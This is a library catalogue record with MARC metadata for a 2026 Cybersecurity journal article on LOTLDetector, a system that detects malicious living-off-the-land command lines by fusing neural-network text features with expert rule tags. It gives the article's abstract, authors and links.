Lotldetector: living off the land attacks detection system based on feature fusion
Shranjeno v:
| izdano v: | Cybersecurity vol. 9, no. 1 (Dec 2026), p. 4 |
|---|---|
| Glavni avtor: | |
| Drugi avtorji: | , , , , , |
| Izdano: |
Springer Nature B.V.
|
| Teme: | |
| Online dostop: | Citation/Abstract Full Text Full Text - PDF |
| Oznake: |
Brez oznak, prvi označite!
|
MARC
| LEADER | 00000nab a2200000uu 4500 | ||
|---|---|---|---|
| 001 | 3290061051 | ||
| 003 | UK-CbPIL | ||
| 022 | |a 2523-3246 | ||
| 024 | 7 | |a 10.1186/s42400-025-00531-w |2 doi | |
| 035 | |a 3290061051 | ||
| 045 | 2 | |b d20261201 |b d20261231 | |
| 100 | 1 | |a Zhu, Tiantian |u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) | |
| 245 | 1 | |a Lotldetector: living off the land attacks detection system based on feature fusion | |
| 260 | |b Springer Nature B.V. |c Dec 2026 | ||
| 513 | |a Journal Article | ||
| 520 | 3 | |a In recent years, Living off the Land (LotL) attacks have been drawing attention due to their flexibility and difficulty in detection. These attacks exploit legitimate tools already in the system to conduct malicious activities, hiding their malicious intent behind normal benign programs. However, detection methods for such attacks largely rely on expert rules. While rule tags can effectively detect known attacks, this also leads to a high false positive rate, resulting in low detection accuracy for the models. To address these issues, we propose a detection system called LOTLDetector, which combines deep learning methods with expert rules to detect malicious command lines in LotL attacks from both data and knowledge perspectives. LOTLDetector learns the semantics of command line text through neural networks and combines rule tags from expert knowledge, enabling a more comprehensive detection of LotL attacks. We extensively evaluated our method, validated it on a Windows dataset containing 27,448 command lines and a Linux dataset containing 27,093 command lines, and compared it with existing methods. The results show that our method significantly outperforms existing methods in detecting malicious command lines. For the Linux dataset, the detection system achieved a detection performance with an accuracy of 0.9728; for the Windows dataset, the system’s detection accuracy also reached 0.9598, which is about 8% higher than the best existing method. In addition, our project has been open-sourced at <ext-link xlink:href="https://github.com/csedikaf/LOTLDetector" ext-link-type="uri">https://github.com/csedikaf/LOTLDetector</ext-link>. | |
| 653 | |a Datasets | ||
| 653 | |a Semantics | ||
| 653 | |a Malware | ||
| 653 | |a Natural language processing | ||
| 653 | |a Deep learning | ||
| 653 | |a Algorithms | ||
| 653 | |a Neural networks | ||
| 653 | |a Linux | ||
| 653 | |a Tags | ||
| 653 | |a Network computers | ||
| 700 | 1 | |a Zheng, Jie |u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) | |
| 700 | 1 | |a Chen, Tieming |u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) | |
| 700 | 1 | |a Lv, Mingqi |u Zhejiang University of Technology, College of Computer Science and Technology, Hangzhou, China (GRID:grid.469325.f) (ISNI:0000 0004 1761 325X) | |
| 700 | 1 | |a Xiong, Chunlin |u China Unicom (Guangdong) Industrial Internet Company Ltd., Guangzhou, China (GRID:grid.469325.f) | |
| 700 | 1 | |a Weng, Zhengqiu |u Wenzhou University of Technology, School of Data Science and Artificial Intelligence, Wenzhou, China (GRID:grid.469325.f) (ISNI:0000 0005 1164 4044) | |
| 700 | 1 | |a Zheng, Xiangyang |u Wenzhou University of Technology, School of Data Science and Artificial Intelligence, Wenzhou, China (GRID:grid.469325.f) (ISNI:0000 0005 1164 4044) | |
| 773 | 0 | |t Cybersecurity |g vol. 9, no. 1 (Dec 2026), p. 4 | |
| 786 | 0 | |d ProQuest |t Publicly Available Content Database | |
| 856 | 4 | 1 | |3 Citation/Abstract |u https://www.proquest.com/docview/3290061051/abstract/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch |
| 856 | 4 | 0 | |3 Full Text |u https://www.proquest.com/docview/3290061051/fulltext/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch |
| 856 | 4 | 0 | |3 Full Text - PDF |u https://www.proquest.com/docview/3290061051/fulltextPDF/embedded/7BTGNMKEMPT1V9Z2?source=fedsrch |